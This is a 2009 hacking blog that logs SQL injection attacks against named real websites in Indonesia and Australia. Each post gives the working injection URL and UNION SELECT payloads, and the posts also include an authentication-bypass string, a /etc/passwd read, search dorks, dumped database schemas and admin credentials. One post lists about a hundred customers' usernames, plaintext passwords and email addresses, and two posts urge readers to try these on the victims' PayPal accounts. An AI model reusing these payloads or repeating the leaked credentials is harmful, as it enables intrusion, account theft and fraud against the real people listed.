viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Friday, February 13, 2009

Saturday, February 7, 2009

[SQLi] http://www.axis.co.id

12:02 PM Posted by viperfx07 No comments


Tools : schemafuzz.py v.50 mod by me
Admin panel: /login.php
Admin user/pwd: mommy:mommy
P.S: this vuln already been found, and it's on google


[+] URL:http://www.axis.co.id/news_detail.php?code=20051124121710+AND+1=2+UNION+SELECT+0,1,sqli,3,4,5,6,7,8,9--
[+] Evasion Used: "+" "--"
[+] 11:53:15
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: axiscoid_db
User: axiscoid_db@localhost
Version: 5.0.37-standard
[+] Showing Tables & Columns from database "axiscoid_db"
[+] Number of Tables: 18


[Database]: axiscoid_db
[Table: Columns]
[0]tb_case: id,product,name,date,description,addtext
[1]tb_complain: id,userid,date,subject,complain
[2]tb_contact: Id,owner,name,email,mobile,ket
[3]tb_file: Id,name,type,folder,shared,created,update,owner,size
[4]tb_link: id,name,address,ket
[5]tb_mcontent: id,category,name,date,description,addtext
[6]tb_news: code,catagory,header,writer,date,news,pic,status,inc
[7]tb_news_status: code,name
[8]tb_news_topic: code,name
[9]tb_partner: id,name,email,address,phone,website,company
[10]tb_product: id,name,date,descreption,pic_front,logo,status,addtext
[11]tb_product_cat: code,name
[12]tb_product_status: code,name
[13]tb_promotion: id,word,date,picture,status,category,link
[14]tb_promotion_cat: id,name
[15]tb_search: id,keyword,address,desc,date
[16]tb_user: id,userid,password,nama,email,alamat,phone,mobile,tmp_lahir,tgl_lahir,status
[17]tb_user_cat: code,name

[-] [11:54:56]
[-] Total URL Requests 97
[-] Done


[+] URL:http://www.axis.co.id/news_detail.php?code=20051124121710+AND+1=2+UNION+SELECT+0,1,sqli,3,4,5,6,7,8,9--
[+] Evasion Used: "+" "--"
[+] 11:56:06
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: axiscoid_db
User: axiscoid_db@localhost
Version: 5.0.37-standard
[+] Dumping data from database "axiscoid_db" Table "tb_user"
[+] Column(s) ['userid', 'password', 'email']
[+] Number of Rows: 1

[0] mommy:2623e0d1f4e1a3093ee71672ec1c771a:mommy@axis.co.id:mommy@axis.co.id:

[-] [11:56:16]
[-] Total URL Requests 3
[-] Done

Thursday, February 5, 2009

[SQLi] http://www.nafed.go.id

3:57 PM Posted by viperfx07 No comments


Tools: schemafuzz.py v5.0 mod by me.
Admin loc: /admin
Admin user/pwd: enter this "' or 'a'='a" (without double quotes) to both fields.
Ps: It's already been owned by some Turkey hackers. ^^


[+] URL:http://www.nafed.go.id/mediacenter.php?ctrl=info&idberita=6'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,sqli,4,5,6,7,8/*
[+] Evasion Used: "/**/" "/*"
[+] 15:58:10
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: bpendb
User: bpendb@localhost
Version: 5.0.27-log

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://www.nafed.go.id/mediacenter.php?ctrl=info&idberita=6'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,concat(user,0x3a,password),4,5,6,7,8/**/FROM/**/mysql.user/*

[+] Do we have Access to Load_File: Yes <-- w00t w00t
[!] http://www.nafed.go.id/mediacenter.php?ctrl=info&idberita=6'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,load_file(0x2f6574632f706173737764),4,5,6,7,8/*

[-] [15:58:19]
[-] Total URL Requests 3
[-] Done

[+] URL:http://www.nafed.go.id/mediacenter.php?ctrl=info&idberita=6'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,sqli,4,5,6,7,8/*
[+] Evasion Used: "/**/" "/*"
[+] 15:48:17
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: bpendb
User: bpendb@localhost
Version: 5.0.27-log
[+] Showing Tables & Columns from database "bpendb"
[+] Number of Tables: 110

Stop here because too many tables.

Tuesday, February 3, 2009

[SQLi] http://www.endonesia.org

5:51 PM Posted by viperfx07 No comments


Dork : "Powered by endonesia 8.4"
Tools: schemafuzz.py v5.0 mod by me
Admin panel: /admin
Admin usr/pwd : Endonesia:jatwar22

[+] URL:http://www.endonesia.org/mod.php?mod=publisher&op=viewarticle&cid=1&artid=2+AND+1=2+UNION+SELECT+sqli,1,2,3,4,5,6,7,8,9--
[+] Evasion Used: "+" "--"
[+] 17:46:47
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: endorg_endorg
User: endorg_endorg@localhost
Version: 5.0.67-community
[+] Dumping data from database "endorg_endorg" Table "authors"
[+] Column(s) ['aid', 'pwd']
[+] Number of Rows: 1

[0] Endonesia:ca1db2899cf4bb64cd1b67ea68140bcc

[SQLi] http://www.iklansolo.net

5:32 PM Posted by viperfx07 No comments


Tools: schemafuzz v5.0 mod by me
Dork : "Powered by eNdonesia 8.4"
This exploit can also be found on milworm.com, but there is a slight different.
Admin panel : http://www.iklansolo.net
Admin usr/pwd : admin : is12123

[+] URL:http://www.iklansolo.net/mod.php?mod=publisher&op=viewcat&cid=9+AND+1=2+UNION+SELECT+sqli,1--
[+] Evasion Used: "+" "--"
[+] 17:36:28
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: isnet_dbend83
User: isnet_siti@localhost
Version: 5.0.67-community
[+] Showing all databases current user has access too!
[+] Number of Databases: 6

[0]isnet_cart
[1]isnet_dbend83
[2]isnet_host
[3]isnet_i1
[4]isnet_i2
[5]isnet_web

[+] URL:http://www.iklansolo.net/mod.php?mod=publisher&op=viewcat&cid=9+AND+1=2+UNION+SELECT+sqli,1--
[+] Evasion Used: "+" "--"
[+] 17:13:35
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: isnet_dbend83
User: isnet_siti@localhost
Version: 5.0.67-community
[+] Showing Tables & Columns from database "isnet_dbend83"
[+] Number of Tables: 36

[Database]: isnet_dbend83
[Table: Columns]
[0]authors: aid,name,url,email,pwd,counter
[1]banner: bid,cid,imptotal,impmade,clicks,imageurl,clickurl,date
[2]bannerclient: cid,name,contact,email,login,passwd,extrainfo
[3]bannerfinish: bid,cid,impressions,clicks,datestart,dateend
[4]counter: type,var,count
[5]lblocks: id,title,content,order_id
[6]main_page_content: main_title,main_text,main_image,main_image_active,alt,active
[7]mod_about: aboutid,parentid,jenis,menu,url,judul,info,foto,fotopos,status,orderid,postdate,lastupdate
[8]mod_content: contid,parentid,jenis,menu,url,judul,info,foto,fotopos,status,orderid,postdate,lastupdate
[9]mod_diskusi: did,cid,title,disktext,author,postdate,counter
[10]mod_diskusi_categories: cid,title,parentid
[11]mod_diskusi_response: rid,did,title,disktext,responder,postdate,counter
[12]mod_iklanbaris: lid,cid,title,description,url,postdate,expiredate,uname
[13]mod_iklanbaris_categories: cid,title,parentid
[14]mod_informasi: infoid,parentid,intypeid,jenis,menu,url,judul,info,foto,fotopos,status,orderid,feat,postdate,lastupdate
[15]mod_informasi_type: intypeid,infotype,status,orderid,postdate
[16]mod_katalog: lid,title,url,description,date,name,email,hits
[17]mod_katalog_categories: cid,title,parentid
[18]mod_katalog_katakate: kake,lid,cid
[19]mod_katalog_related: kare,cid,related
[20]mod_katalog_validate: lid,cid,title,url,description,name,email,date
[21]mod_newsletter: tipnl_id,tipnl_title,tipnl_description,tipnl_htmlemail,tipnl_plainemail,tipnl_status
[22]mod_newsletter_members: tipnm_id,tipnm_name,tipnm_email,tipnm_newsid,tipnm_mailpref
[23]mod_poll_comments: cid,rid,pid,date,name,email,url,host_name,subject,comment,score,reason
[24]mod_poll_data: pid,data
[25]mod_poll_flag: pid,flag
[26]mod_publisher: artid,aid,title,time,released,hometext,bodytext,counter,informant,media,extension
[27]mod_publisher_categories: cid,title,parentid,orderid
[28]mod_publisher_frontpage: fpid,position,category,flimit,orderid,media
[29]mod_publisher_media: mid,artid,extension,thumbnail_extension,title,description,short_description,width,height,filesize,time
[30]mod_publisher_submit: subid,cid,title,time,hometext,bodytext,informant
[31]mod_publisher_topik: ptid,artid,cid
[32]modules: id,name,source_file,img,plug_dir,block_pos,block_order,block_file,admin_only,user_only,admin_inc,about
[33]new_referer: ref_id,url,hit_total,time
[34]rblocks: id,title,content,order_id
[35]users: uid,name,uname,email,femail,url,pass,storynum,bio,ublockon,ublock,theme,counter,regdate,lastlogin

[-] [17:21:01]
[-] Total URL Requests 245
[-] Done


[+] URL:http://www.iklansolo.net/mod.php?mod=publisher&op=viewcat&cid=9+AND+1=2+UNION+SELECT+sqli,1--
[+] Evasion Used: "+" "--"
[+] 17:25:46
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: isnet_dbend83
User: isnet_siti@localhost
Version: 5.0.67-community
[+] Dumping data from database "isnet_dbend83" Table "authors"
[+] Column(s) ['name', 'pwd']
[+] Number of Rows: 1

[0] admin:df9dc8d9eac3e24570e9d39ac2a90988: = is12123

[-] [17:25:52]
[-] Total URL Requests 3
[-] Done

[SQLi] http://www.enutrition.com.au

2:06 PM Posted by viperfx07 1 comment
Tools : schemafuzz.py v5.0 mod by me
Adv : some email password is their paypal password. So dump it and check it by yourself. First 102 rows are already dumped by me.

[+] URL:http://www.enutrition.com.au/product.php?p_id=491+AND+1=2+UNION+SELECT+0,1,sqli,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
[+] Evasion Used: "+" "--"
[+] 13:32:19
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: enutriti_enut08
User: enutriti_usr08@localhost
Version: 5.0.51a-community
[+] Showing Tables & Columns from database "enutriti_enut08"
[+] Number of Tables: 18


[Database]: enutriti_enut08
[Table: Columns]
[0]ahfa_disallow: id,username
[1]ahfa_f_category: cate_id,cate_title,cate_order,cate_lock
[2]ahfa_f_forum: forum_id,cate_id,forum_title,forum_desc,forum_order,forum_lock,last_post
[3]ahfa_f_post: post_id,topic_id,forum_id,userid,username,post_ip,post_added,post_edited,post_subject,post_text,topic
[4]ahfa_f_topic: topic_id,forum_id,topic_title,topic_poster,topic_views,topic_replies,last_post,topic_lock,topic_moved_id
[5]ahfa_f_topic_watch: topic_id,userid
[6]ahfa_newsletter: id,name,email,active,added
[7]ahfa_s_brand: brand_id,brand
[8]ahfa_s_category: cate_id,cate_title,cate_order,html_title,keywords,description,cate_lock
[9]ahfa_s_code: code_id,code_name,code,type,discount,expiry,active
[10]ahfa_s_order: order_id,userid,personal,added,total,billing,delivery,items,trans_id,code,discount_type
[11]ahfa_s_postage: postage_id,postage
[12]ahfa_s_product: product_id,subcate_id,cate_id,brand_id,product_title,recommended,caption,product_desc,html_title,keywords,description,product_price,gst,rrp,product_qty,alert_qty,product_lock,discount,image,added,sold,link,postage1,postage2,supplier_id,discount_type
[13]ahfa_s_subcate: subcate_id,cate_id,subcate_title,subcate_desc,subcate_order,html_title,keywords,description,subcate_lock
[14]ahfa_s_supplier: supplier_id,supplier,supplier_email
[15]ahfa_s_temp: order_id,uid,np_details,nb_details,nd_details,my_cart,code,discount_type,total_price,discounted_products
[16]ahfa_user: userid,username,password,firstname,lastname,signature,email,contact,age,gender,height,weight,marketing,addr1,addr2,city,state,postcode,country,p_addr1,p_addr2,p_city,p_state,p_postcode,p_country,type,active,banned,added,edited,visited,posts,orders,viewed,ordered,activation_code
[17]ahfa_words: word_id,word,replacement

[-] [13:33:48]
[-] Total URL Requests 158
[-] Done

[+] URL:http://www.enutrition.com.au/product.php?p_id=491+AND+1=2+UNION+SELECT+0,1,sqli,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
[+] Evasion Used: "+" "--"
[+] 13:37:34
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: enutriti_enut08
User: enutriti_usr08@localhost
Version: 5.0.51a-community
[+] Dumping data from database "enutriti_enut08" Table "ahfa_user"
[+] Column(s) ['username', 'password', 'email']
[+] Number of Rows: 421

[0] Chloe:q3qri387:chloe_rob@hotmail.com
[1] enutritionsupps:amg30426:admin@enutrition.com.
[2] new_user:password:sam@healthfitness.com.au
[3] healthfitness:healthfitness:stefan@fitnessmail.net
[4] NABtest:test123:nabtest@testnab.com.au
[5] amg304:celly26:rob@enutrition.com.au
[6] robertof:0range123:roberto@francesconi.com.aurobertof:0range123:roberto@francesconi.com.au:
[7] JasmineRobinson:jafazz:jasmine.robinson@blakedawson.comJasmineRobinson:jafazz:jasmine.robinson@blakedawson.com:
[8] mikeayb:mb1240:mikeayb@hotmail.com
[9] jayceee:addiction:eschy@bigpond.com
[10] jasewell1:radios:jasewell1@bigpond.comjasewell1:radios:jasewell1@bigpond.com:
[11] EEwing:eewing:efrem.ewing@bigpond.comEEwing:eewing:efrem.ewing@bigpond.com:
[12] jeffcook2812:jefferson:jeffcook2812@optusnet.com.aujeffcook2812:jefferson:jeffcook2812@optusnet.com.au:
[13] zinet:cadqiwho:zinet69@hotmail.comzinet:cadqiwho:zinet69@hotmail.com:
[14] Morgy5:furrybum:Morgan2042@yahoo.comMorgy5:furrybum:Morgan2042@yahoo.com:
[15] Stormy:blacky:aca88768@bigpond.net.auStormy:blacky:aca88768@bigpond.net.au:
[16] tonysoprano:qabanass:sweepingplains@hotmail.comtonysoprano:qabanass:sweepingplains@hotmail.com:
[17] mattkumeroa:matt27380:manager.albionpark@bhfc.com.aumattkumeroa:matt27380:manager.albionpark@bhfc.com.au:
[18] adrian_yap:1lawyer1:adrian.yap@inbox.comadrian_yap:1lawyer1:adrian.yap@inbox.com:
[19] crazed_hobo:casper1:harbenger@hotmail.comcrazed_hobo:casper1:harbenger@hotmail.com:
[20] jacob_cuzz:bzhubb:jacob_cuzz@hotmail.comjacob_cuzz:bzhubb:jacob_cuzz@hotmail.com:
[21] qte100:qte100:brad@rightpeople.com.auqte100:qte100:brad@rightpeople.com.au:
[22] stevew001:karakite:kitena@trinity.sa.edu.austevew001:karakite:kitena@trinity.sa.edu.au:
[23] Kosta:florinagreece:moukas@optusnet.com.auKosta:florinagreece:moukas@optusnet.com.au:
[24] mchahine:sarah1:sessah1@hotmail.commchahine:sarah1:sessah1@hotmail.com:
[25] troysa:tanika:tma@andrewsjakeman.com.autroysa:tanika:tma@andrewsjakeman.com.au:
[26] kulturista8:im.there:mirek1968200@yahoo.com.aukulturista8:im.there:mirek1968200@yahoo.com.au:
[27] kulturista88:im.there.:mvaculka@bigpond.net.aukulturista88:im.there.:mvaculka@bigpond.net.au:
[28] Michelle:mich1961:mybelle61@optusnet.com.auMichelle:mich1961:mybelle61@optusnet.com.au:
[29] neoalbert:MARRY009:neoalbert@yahoo.comneoalbert:MARRY009:neoalbert@yahoo.com:
[30] kegs39:jasper:adam.moody@yahoo.com.aukegs39:jasper:adam.moody@yahoo.com.au:
[31] alsky08:ruby1956:sanctum@bigpond.comalsky08:ruby1956:sanctum@bigpond.com:
[32] samboyfive:rubyruby:sam_keast@hotmail.comsamboyfive:rubyruby:sam_keast@hotmail.com:
[33] colossal0388:d3lta9559:hyperion0388@hotmail.comcolossal0388:d3lta9559:hyperion0388@hotmail.com:
[34] troyo911:gargamel:troyo911@hotmail.comtroyo911:gargamel:troyo911@hotmail.com:
[35] wewens:sparky0:wewens@optusnet.com.auwewens:sparky0:wewens@optusnet.com.au:
[36] beavachk:vanessa:beavachk@yahoo.com.aubeavachk:vanessa:beavachk@yahoo.com.au:
[37] davidking:wallabies:davidking1530@yahoo.com.audavidking:wallabies:davidking1530@yahoo.com.au:
[38] fester:fester:mrt@hillrogers.com.aufester:fester:mrt@hillrogers.com.au:
[39] 1141080:teem8335:eikomania@hotmail.com1141080:teem8335:eikomania@hotmail.com:
[40] alex_sward:retsehcnam:alex_sward@hotmail.comalex_sward:retsehcnam:alex_sward@hotmail.com:
[41] mkoler:kikinda:mkoler@caltex.com.aumkoler:kikinda:mkoler@caltex.com.au:
[42] davros:dunamis:cdavy@iinet.net.audavros:dunamis:cdavy@iinet.net.au:
[43] shivaz:worming1:justin@inwa.com.aushivaz:worming1:justin@inwa.com.au:
[44] dieter:debsf1:admin@allcentralonline.com.audieter:debsf1:admin@allcentralonline.com.au:
[45] pdurel:f48dc47:patrick.durel@arts.monash.edu.aupdurel:f48dc47:patrick.durel@arts.monash.edu.au:
[46] gregmcgrath3:morgan88:sethshouse_727@hotmail.comgregmcgrath3:morgan88:sethshouse_727@hotmail.com:
[47] Benny101:rocky101:b.wills@employersmutual.com.auBenny101:rocky101:b.wills@employersmutual.com.au:
[48] charlotteorr:oscartj:charlotteorr@hotmail.comcharlotteorr:oscartj:charlotteorr@hotmail.com:
[49] Jordan:pippen33:alexhealthclub@yahoo.com.auJordan:pippen33:alexhealthclub@yahoo.com.au:
[50] bbarker:just4supps:dbarlocal@yahoo.combbarker:just4supps:dbarlocal@yahoo.com:
[51] smileyman:CAnAdiAn12:morganjus@gmail.comsmileyman:CAnAdiAn12:morganjus@gmail.com:
[52] Mugz:pa55word:mugz@internode.on.netMugz:pa55word:mugz@internode.on.net:
[53] scuba:hardhat12341:lampshade_481@hotmail.comscuba:hardhat12341:lampshade_481@hotmail.com:
[54] RachelleIrving:sato01:rachelle.irving@mhca.org.auRachelleIrving:sato01:rachelle.irving@mhca.org.au:
[55] Fiona129:279964:fiona.fm.coughtrie@centrelink.gov.auFiona129:279964:fiona.fm.coughtrie@centrelink.gov.au:
[56] larissatimbs:superjsg:larissa.timbs@telstra.comlarissatimbs:superjsg:larissa.timbs@telstra.com:
[57] kinghenry12:theeight:kinghenry12@hotmail.comkinghenry12:theeight:kinghenry12@hotmail.com:
[58] allanahj:allanah:allanahj@hotmail.comallanahj:allanah:allanahj@hotmail.com:
[59] derigo:Buttons:leigh.derigo@austrade.gov.auderigo:Buttons:leigh.derigo@austrade.gov.au:
[60] iamhe77:31nene:cbaddock@netspace.net.auiamhe77:31nene:cbaddock@netspace.net.au:
[61] Allan:all4GOD:allanbrooks1@bigpond.comAllan:all4GOD:allanbrooks1@bigpond.com:
[62] karon:samson:karonb@tpg.com.aukaron:samson:karonb@tpg.com.au:
[63] Andrew69:wetsex69:andygalovic@yahoo.com.auAndrew69:wetsex69:andygalovic@yahoo.com.au:
[64] robpenfold:oxiana:robpenfold@hotmail.comrobpenfold:oxiana:robpenfold@hotmail.com:
[65] mcarewic:trouser:mcarewic@hotmail.commcarewic:trouser:mcarewic@hotmail.com:
[66] plintm02:eight8fullr:plintm02@student.uwa.edu.auplintm02:eight8fullr:plintm02@student.uwa.edu.au:
[67] irongrasshopper:kidmuscle69:robert_king1988@yahoo.comirongrasshopper:kidmuscle69:robert_king1988@yahoo.com:
[68] Mark:freeformer:markwight@adam.com.auMark:freeformer:markwight@adam.com.au:
[69] carmels:crystal:carmels@grapevine.com.aucarmels:crystal:carmels@grapevine.com.au:
[70] SIMONMYERS:TRUDYLEECE:simon.myers@ttw.com.auSIMONMYERS:TRUDYLEECE:simon.myers@ttw.com.au:
[71] jack:jasper:earnestbeancompany@bigpond.comjack:jasper:earnestbeancompany@bigpond.com:
[72] dbergen:talgarno2575:dane@danebergen.comdbergen:talgarno2575:dane@danebergen.com:
[73] michaeltrotter:magg22:michael.trotter@justice.vic.gov.aumichaeltrotter:magg22:michael.trotter@justice.vic.gov.au:
[74] kazzafitz:Arthur03:kazzafitz@optusnet.com.aukazzafitz:Arthur03:kazzafitz@optusnet.com.au:
[75] Cathryn:Bridey:cathryn283@hotmail.comCathryn:Bridey:cathryn283@hotmail.com:
[76] JoelKA:flexing:joel_bigman@hotmail.comJoelKA:flexing:joel_bigman@hotmail.com:
[77] millib:2701peng:barbara.milliken@kornferry.commillib:2701peng:barbara.milliken@kornferry.com:
[78] roush99:edwards:simon.tait2@bigpond.comroush99:edwards:simon.tait2@bigpond.com:
[79] Junk:Fiscat:koora_plunkett@bigpond.com.auJunk:Fiscat:koora_plunkett@bigpond.com.au:
[80] alfishy:alex01:alfishy@bigpond.net.aualfishy:alex01:alfishy@bigpond.net.au:
[81] triologist:yingweem1:triologist@yahoo.comtriologist:yingweem1:triologist@yahoo.com:
[82] hiluxhilux:speaker:sandkhilton@yahoo.com.auhiluxhilux:speaker:sandkhilton@yahoo.com.au:
[83] pmonamy:xr8boss260i:phil_m_87@yahoo.com.aupmonamy:xr8boss260i:phil_m_87@yahoo.com.au:
[84] bcouper:syntax25:bradcouper@hotmail.combcouper:syntax25:bradcouper@hotmail.com:
[85] jackwoodrup:donkey:jackwoodrup@hotmail.comjackwoodrup:donkey:jackwoodrup@hotmail.com:
[86] sonjasecker:ps2106:sonjasecker@aol.comsonjasecker:ps2106:sonjasecker@aol.com:
[87] schuan:enutrition:duriel@iinet.net.auschuan:enutrition:duriel@iinet.net.au:
[88] ben_1301:football5:ben_1301@hotmail.comben_1301:football5:ben_1301@hotmail.com:
[89] gmmurphy:shamizen9:gerard@epic-events.com.augmmurphy:shamizen9:gerard@epic-events.com.au:
[90] kezmez:toto12toto:kezmez39@hotmail.comkezmez:toto12toto:kezmez39@hotmail.com:
[91] shonl9:fish2010:resandshon@hotmail.comshonl9:fish2010:resandshon@hotmail.com:
[92] dalila6994:pusspuss6994:dalila@westnet.com.audalila6994:pusspuss6994:dalila@westnet.com.au:
[93] Monster:emma30:robbtoon@hotmail.comMonster:emma30:robbtoon@hotmail.com:
[94] william:roc777:howcroft@iinet.net.auwilliam:roc777:howcroft@iinet.net.au:
[95] akcurrie:d890ml:andrew@clearoutcomes.com.auakcurrie:d890ml:andrew@clearoutcomes.com.au:
[96] scottk:scotty:scottykrauss@hotmail.comscottk:scotty:scottykrauss@hotmail.com:
[97] Lynne:GIGGImimmi:bling0423@hotmail.comLynne:GIGGImimmi:bling0423@hotmail.com:
[98] KRISKALI:HITLERBURGER:KRISKALI777@HOTMAIL.COMKRISKALI:HITLERBURGER:KRISKALI777@HOTMAIL.COM:
[99] bkellett:bobbie12:bkellett@internode.on.netbkellett:bobbie12:bkellett@internode.on.net:
[100] pfrances:subzero:giovanni@francesconi.com.aupfrances:subzero:giovanni@francesconi.com.au:
[101] emjaylow:honey1:emjaylow@netspeed.com.auemjaylow:honey1:emjaylow@netspeed.com.au:
[102] Bizzle:pa55word:martin@wfsystems.comBizzle:pa55word:martin@wfsystems.com:

[SQLi] http://www.healthfitness.com.au

2:02 PM Posted by viperfx07 No comments
Tools: schemafuzz.py v5.0 mod by me
Advantage: Use it wisely. Dump it and check if their paypal password is their email password ^^

[+] URL:http://www.healthfitness.com.au/shop/product.php?p_id=56+AND+1=2+UNION+SELECT+0,1,sqli,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
[+] Evasion Used: "+" "--"
[+] 13:29:28
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: db60028b
User: us60028a@localhost
Version: 5.0.19-standard
[+] Showing Tables & Columns from database "db60028b"
[+] Number of Tables: 72

[Database]: db60028b
[Table: Columns]
[0]ahfa_disallow: id,username
[1]ahfa_f_category: cate_id,cate_title,cate_order
[2]ahfa_f_forum: forum_id,cate_id,forum_title,forum_desc,forum_order,forum_lock,last_post
[3]ahfa_f_post: post_id,topic_id,forum_id,userid,username,post_ip,post_added,post_edited,post_subject,post_text,topic
[4]ahfa_f_topic: topic_id,forum_id,topic_title,topic_poster,topic_views,topic_replies,last_post,topic_lock,topic_moved_id
[5]ahfa_f_topic_watch: topic_id,userid
[6]ahfa_forumauth_access: group_id,forum_id,auth_view,auth_read,auth_post,auth_reply,auth_edit,auth_delete,auth_sticky,auth_announce,auth_vote,auth_pollcreate,auth_attachments,auth_mod
[7]ahfa_forumbanlist: ban_id,ban_userid,ban_ip,ban_email
[8]ahfa_forumcategories: cat_id,cat_title,cat_order
[9]ahfa_forumconfig: config_name,config_value
[10]ahfa_forumconfirm: confirm_id,session_id,code
[11]ahfa_forumdisallow: disallow_id,disallow_username
[12]ahfa_forumforum_prune: prune_id,forum_id,prune_days,prune_freq
[13]ahfa_forumforums: forum_id,cat_id,forum_name,forum_desc,forum_status,forum_order,forum_posts,forum_topics,forum_last_post_id,prune_next,prune_enable,auth_view,auth_read,auth_post,auth_reply,auth_edit,auth_delete,auth_sticky,auth_announce,auth_vote,auth_pollcreate,auth_attachments
[14]ahfa_forumgroups: group_id,group_type,group_name,group_description,group_moderator,group_single_user
[15]ahfa_forumposts: post_id,topic_id,forum_id,poster_id,post_time,poster_ip,post_username,enable_bbcode,enable_html,enable_smilies,enable_sig,post_edit_time,post_edit_count
[16]ahfa_forumposts_text: post_id,bbcode_uid,post_subject,post_text
[17]ahfa_forumprivmsgs: privmsgs_id,privmsgs_type,privmsgs_subject,privmsgs_from_userid,privmsgs_to_userid,privmsgs_date,privmsgs_ip,privmsgs_enable_bbcode,privmsgs_enable_html,privmsgs_enable_smilies,privmsgs_attach_sig
[18]ahfa_forumprivmsgs_text: privmsgs_text_id,privmsgs_bbcode_uid,privmsgs_text
[19]ahfa_forumranks: rank_id,rank_title,rank_min,rank_special,rank_image
[20]ahfa_forumsearch_results: search_id,session_id,search_time,search_array
[21]ahfa_forumsearch_wordlist: word_text,word_id,word_common
[22]ahfa_forumsearch_wordmatch: post_id,word_id,title_match
[23]ahfa_forumsessions: session_id,session_user_id,session_start,session_time,session_ip,session_page,session_logged_in,session_admin
[24]ahfa_forumsessions_keys: key_id,user_id,last_ip,last_login
[25]ahfa_forumsmilies: smilies_id,code,smile_url,emoticon
[26]ahfa_forumthemes: themes_id,template_name,style_name,head_stylesheet,body_background,body_bgcolor,body_text,body_link,body_vlink,body_alink,body_hlink,tr_color1,tr_color2,tr_color3,tr_class1,tr_class2,tr_class3,th_color1,th_color2,th_color3,th_class1,th_class2,th_class3,td_color1,td_color2,td_color3,td_class1,td_class2,td_class3,fontface1,fontface2,fontface3,fontsize1,fontsize2,fontsize3,fontcolor1,fontcolor2,fontcolor3,span_class1,span_class2,span_class3,img_size_poll,img_size_privmsg
[27]ahfa_forumthemes_name: themes_id,tr_color1_name,tr_color2_name,tr_color3_name,tr_class1_name,tr_class2_name,tr_class3_name,th_color1_name,th_color2_name,th_color3_name,th_class1_name,th_class2_name,th_class3_name,td_color1_name,td_color2_name,td_color3_name,td_class1_name,td_class2_name,td_class3_name,fontface1_name,fontface2_name,fontface3_name,fontsize1_name,fontsize2_name,fontsize3_name,fontcolor1_name,fontcolor2_name,fontcolor3_name,span_class1_name,span_class2_name,span_class3_name
[28]ahfa_forumtopics: topic_id,forum_id,topic_title,topic_poster,topic_time,topic_views,topic_replies,topic_status,topic_vote,topic_type,topic_first_post_id,topic_last_post_id,topic_moved_id
[29]ahfa_forumtopics_watch: topic_id,user_id,notify_status
[30]ahfa_forumuser_group: group_id,user_id,user_pending
[31]ahfa_forumusers: user_id,user_active,username,user_password,user_session_time,user_session_page,user_lastvisit,user_regdate,user_level,user_posts,user_timezone,user_style,user_lang,user_dateformat,user_new_privmsg,user_unread_privmsg,user_last_privmsg,user_login_tries,user_last_login_try,user_emailtime,user_viewemail,user_attachsig,user_allowhtml,user_allowbbcode,user_allowsmile,user_allowavatar,user_allow_pm,user_allow_viewonline,user_notify,user_notify_pm,user_popup_pm,user_rank,user_avatar,user_avatar_type,user_email,user_icq,user_website,user_from,user_sig,user_sig_bbcode_uid,user_aim,user_yim,user_msnm,user_occ,user_interests,user_actkey,user_newpasswd
[32]ahfa_forumvote_desc: vote_id,topic_id,vote_text,vote_start,vote_length
[33]ahfa_forumvote_results: vote_id,vote_option_id,vote_option_text,vote_result
[34]ahfa_forumvote_voters: vote_id,vote_user_id,vote_user_ip
[35]ahfa_forumwords: word_id,word,replacement
[36]ahfa_s_brand: brand_id,brand
[37]ahfa_s_category: cate_id,cate_title,cate_order,html_title,keywords,description,cate_lock
[38]ahfa_s_order: order_id,userid,personal,added,total,billing,delivery,items,trans_id,processed
[39]ahfa_s_postage: postage_id,postage
[40]ahfa_s_product: product_id,subcate_id,cate_id,brand_id,product_title,caption,product_desc,html_title,keywords,description,product_price,gst,rrp,product_qty,product_lock,discount,image,added,sold,link,postage1,postage2,supplier_id
[41]ahfa_s_subcate: subcate_id,cate_id,subcate_title,subcate_desc,subcate_order,html_title,keywords,description,subcate_lock
[42]ahfa_s_supplier: supplier_id,supplier,supplier_email
[43]ahfa_s_temp: order_id,uid,np_details,nb_details,nd_details,my_cart
[44]ahfa_user: userid,username,password,firstname,lastname,signature,email,contact,age,gender,height,weight,marketing,addr1,addr2,city,state,postcode,country,p_addr1,p_addr2,p_city,p_state,p_postcode,p_country,type,active,banned,added,edited,visited,posts,orders,viewed,ordered,activation_code
[45]ahfa_words: word_id,word,replacement
[46]hfc: userid,Category,FirstName,LastName,Dear,Title,Company,Addr1,Addr2,City,Area,Suburb,State,Zip,Country,Assistant,Phone1,PhDesc1,Phone2,PhDesc2,Mobile,MobileDec1,Fax1,Fax2,Email1,Email2,Email3,Description,Website,Blurb,DateAdded,DateChanged,DateChangedU,ip,browser,Paid,SidePicture,Logo,username,password,Timetable,Headline,CalltoAction,SODescription,SpecialOffersLink,TermsConditions,DirectoryType,CategoryBusiness,ServiceCategory,CityBusiness
[47]hfc_exp: userid,Category,FirstName,LastName,Dear,Title,Company,Addr1,Addr2,City,Area,Suburb,State,Zip,Country,Assistant,Phone1,PhDesc1,Phone2,PhDesc2,Mobile,MobileDec1,Fax1,Fax2,Email1,Email2,Email3,Description,Website,Blurb,DateAdded,TimeAdded,ip,browser,Paid,SidePicture,Logo,username,password,Timetable,Headline,CalltoAction,SODescription,SpecialOffersLink,TermsConditions
